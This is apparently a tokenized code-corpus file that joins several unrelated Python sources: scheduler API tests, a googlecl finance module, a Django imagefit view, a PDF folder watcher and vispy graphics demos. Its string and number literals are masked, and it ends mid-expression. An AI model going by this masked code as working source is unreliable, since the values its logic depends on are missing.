        self.assertEqual(response.status_code, 200)
        job = json.loads(response.get_data(as_text=True))
        self.assertIsNone(job.get('<STR_LIT>'))
        # ...and resuming restores it.
        response = self.client.post('<STR_LIT>')
        self.assertEqual(response.status_code, 200)
        job = json.loads(response.get_data(as_text=True))
        self.assertIsNotNone(job.get('<STR_LIT>'))

    def test_pause_and_resume_job_not_found(self):
        response = self.client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT>)
        response = self.client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT>)

    def test_run_job(self):
        self.__add_job()
        response = self.client.post('<STR_LIT>')
        self.assertEqual(response.status_code, 200)
        job = json.loads(response.get_data(as_text=True))
        self.assertIsNotNone(job.get('<STR_LIT>'))

    def test_run_job_not_found(self):
        response = self.client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT>)

    def __add_job(self):
        """Helper: create one job through the REST API and return the
        decoded response body."""
        job = {
            '<STR_LIT:id>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': 10,
        }
        response = self.client.post('<STR_LIT>', data=json.dumps(job))
        return json.loads(response.get_data(as_text=True))


def job1(x=0):
    # Target function the scheduled jobs point at.
    print(x)
import googlecl
import inspect
import logging
import os
import sys
from googlecl.base import Task

safe_encode = googlecl.safe_encode
# Service name is the last component of this module's dotted path.
service_name = __name__.split('<STR_LIT:.>')[-1]
LOGGER_NAME = __name__
SECTION_HEADER = service_name.upper()
LOG = logging.getLogger(LOGGER_NAME)


class BaseFormatter(object):
    """Tabular output formatter: selects fields from an entry and renders
    them through a %-style format string built from avail_fields."""

    def __init__(self, avail_fields, fields, sep='<STR_LIT:U+002C>'):
        """avail_fields is a list of (name, format-fragment) pairs; *fields*
        is an optional separated list restricting/ordering the columns."""
        if fields:
            self.fields = fields.split(sep)
        else:
            # Default to every available field, in declaration order.
            self.fields = [item[0] for item in avail_fields]
        self.avail_fields = avail_fields
        avail_dict = dict(avail_fields)
        # Space-joined fragments form one big %-format template.
        self.format = '<STR_LIT:U+0020>'.join(avail_dict[name] for name in self.fields)

    @property
    def header(self):
        """Header row: each field name with underscores spaced out and
        capitalized, substituted into the same format template."""
        return self.format % dict([(item[0],
                                    item[0].replace('<STR_LIT:_>', '<STR_LIT:U+0020>').capitalize())
                                   for item in self.avail_fields])

    def get_line(self, entry):
        """Render one entry; subclasses must override."""
        raise NotImplementedError("<STR_LIT>" %
                                  (self.__class__.__name__,
                                   inspect.stack()[0][3]))

    def output(self, entries, stream=sys.stdout):
        """Write the header (when non-empty) and one line per entry."""
        if self.header:
            stream.write(self.header + os.linesep)
        for entry in entries:
            stream.write(self.get_line(entry) + os.linesep)


class PortfolioFormatter(BaseFormatter):
    avail_fields = [('<STR_LIT:id>', '<STR_LIT>'), ('<STR_LIT:title>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>')]

    def __init__(self, fields):
        # NOTE(review): super(self.__class__, ...) recurses infinitely if
        # this class is ever subclassed; super(PortfolioFormatter, self)
        # would be safer. Left as-is (documentation-only change).
        super(self.__class__, self).__init__(self.avail_fields, fields)

    def get_line(self, entry):
        data = entry.portfolio_data
        # The `x and x.money[0].amount` pattern yields None/falsy when the
        # optional money field is absent.
        return self.format % {'<STR_LIT:id>': entry.portfolio_id,
                              '<STR_LIT:title>': entry.portfolio_title,
                              '<STR_LIT>': data.currency_code,
                              '<STR_LIT>': data.gain and data.gain.money[0].amount,
                              '<STR_LIT>': '<STR_LIT>' % (float(data.gain_percentage) * 100,),
                              '<STR_LIT>': data.cost_basis and data.cost_basis.money[0].amount,
                              '<STR_LIT>': data.days_gain and data.days_gain.money[0].amount,
                              '<STR_LIT>': data.market_value and data.market_value.money[0].amount
                              }


class PositionFormatter(BaseFormatter):
    avail_fields = [('<STR_LIT>', '<STR_LIT>'), ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>')]

    def __init__(self, fields):
        # NOTE(review): same super(self.__class__, ...) caveat as above.
        super(self.__class__, self).__init__(self.avail_fields, fields)

    def get_line(self, entry):
        data = entry.position_data
        return self.format % {'<STR_LIT>': entry.ticker_id,
                              '<STR_LIT>': data.shares,
                              '<STR_LIT>': data.gain and data.gain.money[0].amount,
                              '<STR_LIT>': '<STR_LIT>' % (float(data.gain_percentage) * 100,),
                              '<STR_LIT>': data.cost_basis and data.cost_basis.money[0].amount,
                              '<STR_LIT>': data.days_gain and data.days_gain.money[0].amount,
                              '<STR_LIT>': data.market_value and data.market_value.money[0].amount
                              }


class TransactionFormatter(BaseFormatter):
    avail_fields = [('<STR_LIT:id>', '<STR_LIT>'), ('<STR_LIT:type>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'), ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT>', '<STR_LIT>'),
                    ('<STR_LIT:date>', '<STR_LIT>'), ('<STR_LIT>', '<STR_LIT>')]

    def __init__(self, fields):
        # NOTE(review): same super(self.__class__, ...) caveat as above.
        super(self.__class__, self).__init__(self.avail_fields, fields)

    def get_line(self, entry):
        data = entry.transaction_data
        if data.date:
            # Keep only the first 10 characters of the timestamp
            # (NOTE(review): this mutates the entry's data in place).
            data.date = data.date[:10]
        return self.format % {'<STR_LIT:id>': entry.transaction_id,
                              '<STR_LIT:type>': data.type,
                              '<STR_LIT>': data.shares,
                              '<STR_LIT>': data.price.money[0].amount,
                              '<STR_LIT>': data.commission.money[0].amount,
                              '<STR_LIT:date>': data.date or '<STR_LIT>',
                              '<STR_LIT>': data.notes or '<STR_LIT>'}


def _run_create(client, options, args):
    """Task body: create a portfolio with the given title and currency."""
    client.CreatePortfolio(options.title, options.currency)


def _run_delete(client, options, args):
    """Task body: delete the portfolio entries matching options.title."""
    entries = client.get_portfolio_entries(options.title, positions=True)
    if entries:
        client.DeleteEntryList(entries, '<STR_LIT>', options.prompt)


def _run_list(client, options, args):
    """Task body: list portfolios (with returns) in the selected fields."""
    entries = client.get_portfolio_entries(returns=True)
    if entries:
        PortfolioFormatter(options.fields).output(entries)
    else:
        LOG.info('<STR_LIT>')


# NOTE: this definition is truncated at the edge of this chunk; its body
# continues beyond the visible source.
def _run_create_position(client, options, args):
    pfl = client.
get_portfolio ( options . title , positions = True ) <EOL> if pfl : <EOL> client . create_transaction ( pfl , "<STR_LIT>" , options . ticker ) <EOL> def _run_delete_positions ( client , options , args ) : <EOL> positions = client . get_positions ( portfolio_title = options . title , <EOL> ticker_id = options . ticker ) <EOL> client . DeleteEntryList ( positions , '<STR_LIT>' , options . prompt , <EOL> callback = lambda pos : client . DeletePosition ( position_entry = pos ) ) <EOL> def _run_list_positions ( client , options , args ) : <EOL> positions = client . get_positions ( options . title , options . ticker , <EOL> include_returns = True ) <EOL> if positions : <EOL> PositionFormatter ( options . fields ) . output ( positions ) <EOL> else : <EOL> LOG . info ( '<STR_LIT>' ) <EOL> def _run_create_transaction ( client , options , args ) : <EOL> pfl = client . get_portfolio ( options . title ) <EOL> if pfl : <EOL> client . create_transaction ( pfl , options . ttype , options . ticker , <EOL> options . shares , options . price , <EOL> options . currency , options . commission , <EOL> options . date , options . notes ) <EOL> def _run_delete_transactions ( client , options , args ) : <EOL> transactions = client . get_transactions ( portfolio_title = options . title , <EOL> ticker_id = options . ticker , <EOL> transaction_id = options . txnid ) <EOL> client . DeleteEntryList ( transactions , '<STR_LIT>' , options . prompt ) <EOL> def _run_list_transactions ( client , options , args ) : <EOL> transactions = client . get_transactions ( portfolio_title = options . title , <EOL> ticker_id = options . ticker , <EOL> transaction_id = options . txnid ) <EOL> TransactionFormatter ( options . fields ) . 
output ( transactions ) <EOL> TASKS = { '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_create , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_delete , <EOL> required = [ '<STR_LIT:title>' ] ) , <EOL> '<STR_LIT:list>' : Task ( '<STR_LIT>' , <EOL> callback = _run_list , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_create_position , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_delete_positions , <EOL> required = [ '<STR_LIT:title>' ] , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_list_positions , <EOL> required = [ '<STR_LIT:title>' ] , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_create_transaction , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> optional = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:date>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_list_transactions , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_delete_transactions , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> } </s>
<s> __version__ = '<STR_LIT:1.0>' <EOL> import django <EOL> from distutils . version import StrictVersion <EOL> dj_version = django . get_version ( ) <EOL> if StrictVersion ( dj_version ) < StrictVersion ( '<STR_LIT>' ) : <EOL> from rolepermissions . loader import load_roles_and_permissions <EOL> load_roles_and_permissions ( ) <EOL> else : <EOL> default_app_config = '<STR_LIT>' </s>
<s> from django . http import HttpResponse <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . core . cache import get_cache <EOL> from django . utils . http import http_date <EOL> from imagefit . conf import settings <EOL> from imagefit . models import Image , Presets <EOL> import os <EOL> cache = get_cache ( settings . IMAGEFIT_CACHE_BACKEND_NAME ) <EOL> def _image_response ( image ) : <EOL> response = HttpResponse ( <EOL> image . render ( ) , <EOL> image . mimetype <EOL> ) <EOL> response [ '<STR_LIT>' ] = http_date ( image . modified ) <EOL> return response <EOL> def resize ( request , path_name , format , url ) : <EOL> if path_name == '<STR_LIT>' : <EOL> prefix = settings . STATIC_ROOT <EOL> elif path_name == '<STR_LIT>' : <EOL> prefix = settings . MEDIA_ROOT <EOL> else : <EOL> prefix = settings . IMAGEFIT_ROOT <EOL> if url [ <NUM_LIT:0> ] == '<STR_LIT:/>' : <EOL> url = url [ <NUM_LIT:1> : ] <EOL> image = Image ( path = os . path . join ( prefix , url ) ) <EOL> if settings . IMAGEFIT_CACHE_ENABLED : <EOL> image . cache = cache <EOL> image . cached_name = request . META . get ( '<STR_LIT>' ) <EOL> if image . is_cached : <EOL> return _image_response ( image ) <EOL> preset = Presets . get ( format ) or Presets . from_string ( format ) <EOL> if not preset : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" % format <EOL> ) <EOL> if preset . get ( '<STR_LIT>' ) : <EOL> image . crop ( preset . get ( '<STR_LIT:width>' ) , preset . get ( '<STR_LIT>' ) ) <EOL> else : <EOL> image . resize ( preset . get ( '<STR_LIT:width>' ) , preset . get ( '<STR_LIT>' ) ) <EOL> image . save ( ) <EOL> return _image_response ( image ) </s>
<s> """<STR_LIT>""" <EOL> import sys , os <EOL> import re <EOL> import logging <EOL> import shutil <EOL> import time <EOL> import glob <EOL> from threading import Lock <EOL> from watchdog . observers import Observer <EOL> from watchdog . events import LoggingEventHandler <EOL> from watchdog . events import FileSystemEventHandler <EOL> class PyPdfWatcher ( FileSystemEventHandler ) : <EOL> """<STR_LIT>""" <EOL> events = { } <EOL> events_lock = Lock ( ) <EOL> def __init__ ( self , monitor_dir , config ) : <EOL> FileSystemEventHandler . __init__ ( self ) <EOL> self . monitor_dir = monitor_dir <EOL> if not config : config = { } <EOL> self . scan_interval = config . get ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> def start ( self ) : <EOL> self . observer = Observer ( ) <EOL> self . observer . schedule ( self , self . monitor_dir ) <EOL> self . observer . start ( ) <EOL> print ( "<STR_LIT>" % ( self . monitor_dir ) ) <EOL> while True : <EOL> logging . info ( "<STR_LIT>" % self . scan_interval ) <EOL> time . sleep ( self . scan_interval ) <EOL> newFile = self . check_queue ( ) <EOL> if newFile : <EOL> yield newFile <EOL> self . observer . join ( ) <EOL> def stop ( self ) : <EOL> self . observer . stop ( ) <EOL> def rename_file_with_spaces ( self , pdf_filename ) : <EOL> """<STR_LIT>""" <EOL> filepath , filename = os . path . split ( pdf_filename ) <EOL> if '<STR_LIT:U+0020>' in filename : <EOL> newFilename = os . path . join ( filepath , filename . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" % ( pdf_filename , newFilename ) ) <EOL> shutil . move ( pdf_filename , newFilename ) <EOL> return newFilename <EOL> else : <EOL> return pdf_filename <EOL> def check_for_new_pdf ( self , ev_path ) : <EOL> """<STR_LIT>""" <EOL> if ev_path . endswith ( "<STR_LIT>" ) : <EOL> if not ev_path . endswith ( "<STR_LIT>" ) : <EOL> PyPdfWatcher . events_lock . acquire ( ) <EOL> if not ev_path in PyPdfWatcher . 
events : <EOL> PyPdfWatcher . events [ ev_path ] = time . time ( ) <EOL> logging . info ( "<STR_LIT>" % ev_path ) <EOL> else : <EOL> if PyPdfWatcher . events [ ev_path ] == - <NUM_LIT:1> : <EOL> logging . info ( "<STR_LIT>" % ( ev_path ) ) <EOL> del PyPdfWatcher . events [ ev_path ] <EOL> else : <EOL> newTime = time . time ( ) <EOL> logging . debug ( "<STR_LIT>" % ( ev_path , newTime ) ) <EOL> PyPdfWatcher . events [ ev_path ] = newTime <EOL> PyPdfWatcher . events_lock . release ( ) <EOL> def on_created ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" % ( event . src_path , time . time ( ) ) ) <EOL> self . check_for_new_pdf ( event . src_path ) <EOL> def on_moved ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" % event . src_path ) <EOL> self . check_for_new_pdf ( event . dest_path ) <EOL> def on_modified ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" % event . src_path ) <EOL> self . check_for_new_pdf ( event . src_path ) <EOL> def check_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> PyPdfWatcher . events_lock . acquire ( ) <EOL> for monitored_file , timestamp in PyPdfWatcher . events . items ( ) : <EOL> if timestamp == - <NUM_LIT:1> : <EOL> del PyPdfWatcher . events [ monitored_file ] <EOL> elif now - timestamp > self . scan_interval : <EOL> logging . info ( "<STR_LIT>" % ( monitored_file ) ) <EOL> del PyPdfWatcher . events [ monitored_file ] <EOL> monitored_file = self . rename_file_with_spaces ( monitored_file ) <EOL> PyPdfWatcher . events [ monitored_file ] = - <NUM_LIT:1> <EOL> PyPdfWatcher . events_lock . release ( ) <EOL> return monitored_file <EOL> PyPdfWatcher . events_lock . release ( ) <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from vispy . io import load_spatial_filters <EOL> from vispy import gloo <EOL> from vispy import app <EOL> I = np . zeros ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:5> , <NUM_LIT:5> ) ) . astype ( np . float32 ) <EOL> I [ <NUM_LIT:1> : <NUM_LIT:4> , <NUM_LIT:1> : : <NUM_LIT:2> ] = <NUM_LIT:0.5> <EOL> I [ <NUM_LIT:1> : : <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:0.5> <EOL> I [ <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1.0> <EOL> kernel , names = load_spatial_filters ( ) <EOL> data = np . zeros ( <NUM_LIT:4> , dtype = [ ( '<STR_LIT>' , np . float32 , <NUM_LIT:2> ) , <EOL> ( '<STR_LIT>' , np . float32 , <NUM_LIT:2> ) ] ) <EOL> data [ '<STR_LIT>' ] = np . array ( [ [ - <NUM_LIT:1> , - <NUM_LIT:1> ] , [ + <NUM_LIT:1> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , + <NUM_LIT:1> ] , [ + <NUM_LIT:1> , + <NUM_LIT:1> ] ] ) <EOL> data [ '<STR_LIT>' ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> VERT_SHADER = """<STR_LIT>""" <EOL> FRAG_SHADER = """<STR_LIT>""" <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self ) : <EOL> app . Canvas . __init__ ( self , keys = '<STR_LIT>' , size = ( ( <NUM_LIT> ) , ( <NUM_LIT> ) ) ) <EOL> self . program = gloo . Program ( VERT_SHADER , FRAG_SHADER % '<STR_LIT>' ) <EOL> self . texture = gloo . Texture2D ( I , interpolation = '<STR_LIT>' ) <EOL> self . kernel = gloo . Texture2D ( kernel , interpolation = '<STR_LIT>' ) <EOL> self . program [ '<STR_LIT>' ] = self . texture <EOL> self . names = names <EOL> self . filter = <NUM_LIT:16> <EOL> self . title = '<STR_LIT>' % self . names [ self . filter ] <EOL> self . program . bind ( gloo . VertexBuffer ( data ) ) <EOL> self . context . set_clear_color ( '<STR_LIT>' ) <EOL> self . context . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) <EOL> self . show ( ) <EOL> def on_key_press ( self , event ) : <EOL> if event . 
key in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if event . key == '<STR_LIT>' : <EOL> step = <NUM_LIT:1> <EOL> else : <EOL> step = - <NUM_LIT:1> <EOL> self . filter = ( self . filter + step ) % <NUM_LIT> <EOL> self . program . set_shaders ( VERT_SHADER , <EOL> FRAG_SHADER % self . names [ self . filter ] ) <EOL> if self . names [ self . filter ] != '<STR_LIT>' : <EOL> self . program [ '<STR_LIT>' ] = self . kernel <EOL> self . program [ '<STR_LIT>' ] = I . shape [ <NUM_LIT:1> ] , I . shape [ <NUM_LIT:0> ] <EOL> self . title = '<STR_LIT>' % self . names [ self . filter ] <EOL> self . update ( ) <EOL> def on_resize ( self , event ) : <EOL> self . context . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , * event . physical_size ) <EOL> def on_draw ( self , event ) : <EOL> self . context . clear ( color = True , depth = True ) <EOL> self . program . draw ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> c = Canvas ( ) <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from vispy import app , scene , visuals <EOL> from vispy . util . filter import gaussian_filter <EOL> import numpy as np <EOL> canvas = scene . SceneCanvas ( keys = '<STR_LIT>' , title = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> canvas . size = <NUM_LIT> , <NUM_LIT> <EOL> canvas . show ( ) <EOL> view = canvas . central_widget . add_view ( ) <EOL> img_data = np . empty ( ( <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:3> ) , dtype = np . ubyte ) <EOL> noise = np . random . normal ( size = ( <NUM_LIT:100> , <NUM_LIT:100> ) , loc = <NUM_LIT:50> , scale = <NUM_LIT> ) <EOL> noise = gaussian_filter ( noise , ( <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> img_data [ : ] = noise [ ... , np . newaxis ] <EOL> image = scene . visuals . Image ( img_data , parent = view . scene ) <EOL> image . transform = visuals . transforms . STTransform ( translate = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0.5> ) ) <EOL> levels = [ <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> ] <EOL> color_lev = [ ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) ] <EOL> curve = scene . visuals . Isocurve ( noise , levels = levels , color_lev = color_lev , <EOL> parent = view . scene ) <EOL> view . camera = scene . PanZoomCamera ( aspect = <NUM_LIT:1> ) <EOL> view . camera . set_range ( ) <EOL> if __name__ == '<STR_LIT:__main__>' and sys . flags . interactive == <NUM_LIT:0> : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from vispy import app , gloo , visuals <EOL> from vispy . geometry import create_box <EOL> from vispy . visuals . transforms import MatrixTransform <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self ) : <EOL> app . Canvas . __init__ ( self , keys = '<STR_LIT>' , size = ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> vertices , faces , outline = create_box ( width = <NUM_LIT:1> , height = <NUM_LIT:1> , depth = <NUM_LIT:1> , <EOL> width_segments = <NUM_LIT:4> , <EOL> height_segments = <NUM_LIT:8> , <EOL> depth_segments = <NUM_LIT:16> ) <EOL> self . box = visuals . BoxVisual ( width = <NUM_LIT:1> , height = <NUM_LIT:1> , depth = <NUM_LIT:1> , <EOL> width_segments = <NUM_LIT:4> , <EOL> height_segments = <NUM_LIT:8> , <EOL> depth_segments = <NUM_LIT:16> , <EOL> vertex_colors = vertices [ '<STR_LIT>' ] , <EOL> edge_color = '<STR_LIT:b>' ) <EOL> self . theta = <NUM_LIT:0> <EOL> self . phi = <NUM_LIT:0> <EOL> self . transform = MatrixTransform ( ) <EOL> self . box . transform = self . transform <EOL> self . show ( ) <EOL> self . timer = app . Timer ( connect = self . rotate ) <EOL> self . timer . start ( <NUM_LIT> ) <EOL> def rotate ( self , event ) : <EOL> self . theta += <NUM_LIT> <EOL> self . phi += <NUM_LIT> <EOL> self . transform . reset ( ) <EOL> self . transform . rotate ( self . theta , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . transform . rotate ( self . phi , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . transform . scale ( ( <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT> ) ) <EOL> self . transform . translate ( ( <NUM_LIT:200> , <NUM_LIT:200> ) ) <EOL> self . update ( ) <EOL> def on_resize ( self , event ) : <EOL> vp = ( <NUM_LIT:0> , <NUM_LIT:0> , self . physical_size [ <NUM_LIT:0> ] , self . physical_size [ <NUM_LIT:1> ] ) <EOL> self . context . set_viewport ( * vp ) <EOL> self . box . transforms . configure ( canvas = self , viewport = vp ) <EOL> def on_draw ( self , ev ) : <EOL> gloo . 
clear ( color = '<STR_LIT>' , depth = True ) <EOL> self . box . draw ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> win = Canvas ( ) <EOL> import sys <EOL> if sys . flags . interactive != <NUM_LIT:1> : <EOL> app . run ( ) </s>
<s> import json <EOL> import numpy as np <EOL> from vispy import app , gloo <EOL> from vispy . util import load_data_file <EOL> from vispy . visuals . collections import PathCollection , PolygonCollection <EOL> from vispy . visuals . transforms import PanZoomTransform <EOL> path = load_data_file ( '<STR_LIT>' ) <EOL> with open ( path , '<STR_LIT:r>' ) as f : <EOL> geo = json . load ( f ) <EOL> def unique_rows ( data ) : <EOL> v = data . view ( data . dtype . descr * data . shape [ <NUM_LIT:1> ] ) <EOL> _ , idx = np . unique ( v , return_index = True ) <EOL> return data [ np . sort ( idx ) ] <EOL> def add ( P , color ) : <EOL> P = np . array ( P ) <EOL> if len ( P ) < <NUM_LIT:2> : <EOL> return <EOL> P = np . array ( P ) / <NUM_LIT> + ( <NUM_LIT:5> , - <NUM_LIT:2> ) <EOL> p = np . zeros ( ( len ( P ) , <NUM_LIT:3> ) ) <EOL> p [ : , : <NUM_LIT:2> ] = P <EOL> p = unique_rows ( p ) <EOL> if len ( p ) > <NUM_LIT:1> : <EOL> paths . append ( p , closed = True ) <EOL> if len ( p ) > <NUM_LIT:2> : <EOL> polys . append ( p , color = color ) <EOL> canvas = app . Canvas ( size = ( <NUM_LIT> , <NUM_LIT> ) , keys = '<STR_LIT>' ) <EOL> gloo . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , canvas . size [ <NUM_LIT:0> ] , canvas . size [ <NUM_LIT:1> ] ) <EOL> gloo . set_state ( "<STR_LIT>" , depth_test = False ) <EOL> panzoom = PanZoomTransform ( canvas , aspect = <NUM_LIT:1> ) <EOL> paths = PathCollection ( mode = "<STR_LIT>" , color = "<STR_LIT>" , transform = panzoom ) <EOL> polys = PolygonCollection ( "<STR_LIT>" , color = "<STR_LIT>" , transform = panzoom ) <EOL> paths . update . connect ( canvas . update ) <EOL> for feature in geo [ "<STR_LIT>" ] : <EOL> if feature [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] == '<STR_LIT>' : <EOL> path = feature [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> rgba = np . random . 
uniform ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:4> ) <EOL> rgba [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> add ( path [ <NUM_LIT:0> ] , color = rgba ) <EOL> elif feature [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] == '<STR_LIT>' : <EOL> coordinates = feature [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> for path in coordinates : <EOL> rgba = np . random . uniform ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:4> ) <EOL> rgba [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> add ( path [ <NUM_LIT:0> ] , color = rgba ) <EOL> paths [ "<STR_LIT>" ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> paths [ "<STR_LIT>" ] = <NUM_LIT:1.0> <EOL> paths [ '<STR_LIT>' ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> <EOL> @ canvas . connect <EOL> def on_draw ( e ) : <EOL> gloo . clear ( '<STR_LIT>' ) <EOL> polys . draw ( ) <EOL> paths . draw ( ) <EOL> @ canvas . connect <EOL> def on_resize ( event ) : <EOL> width , height = event . size <EOL> gloo . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) <EOL> paths [ '<STR_LIT>' ] = <NUM_LIT:0> , <NUM_LIT:0> , width , height <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> canvas . show ( ) <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> from vispy import app , gloo <EOL> vertex = """<STR_LIT>""" <EOL> fragment = """<STR_LIT>""" <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> app . Canvas . __init__ ( self , * args , ** kwargs ) <EOL> self . program = gloo . Program ( vertex , fragment ) <EOL> self . program [ "<STR_LIT>" ] = [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , ( - <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , - <NUM_LIT:1> ) ] <EOL> self . scale = <NUM_LIT:3> <EOL> self . program [ "<STR_LIT>" ] = set_emulated_double ( self . scale ) <EOL> self . center = [ - <NUM_LIT:0.5> , <NUM_LIT:0> ] <EOL> self . bounds = [ - <NUM_LIT:2> , <NUM_LIT:2> ] <EOL> self . translate_center ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . iterations = self . program [ "<STR_LIT>" ] = <NUM_LIT> <EOL> self . apply_zoom ( ) <EOL> self . min_scale = <NUM_LIT> <EOL> self . max_scale = <NUM_LIT:4> <EOL> gloo . set_clear_color ( color = '<STR_LIT>' ) <EOL> self . show ( ) <EOL> def on_draw ( self , event ) : <EOL> self . program . draw ( ) <EOL> def on_resize ( self , event ) : <EOL> self . apply_zoom ( ) <EOL> def apply_zoom ( self ) : <EOL> width , height = self . physical_size <EOL> gloo . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) <EOL> self . program [ '<STR_LIT>' ] = set_emulated_double ( <NUM_LIT:1> / width ) <EOL> self . program [ '<STR_LIT>' ] = set_emulated_double ( <NUM_LIT:1> / height ) <EOL> def on_mouse_move ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . is_dragging and event . buttons [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> x0 , y0 = event . last_event . pos [ <NUM_LIT:0> ] , event . last_event . pos [ <NUM_LIT:1> ] <EOL> x1 , y1 = event . pos [ <NUM_LIT:0> ] , event . pos [ <NUM_LIT:1> ] <EOL> X0 , Y0 = self . 
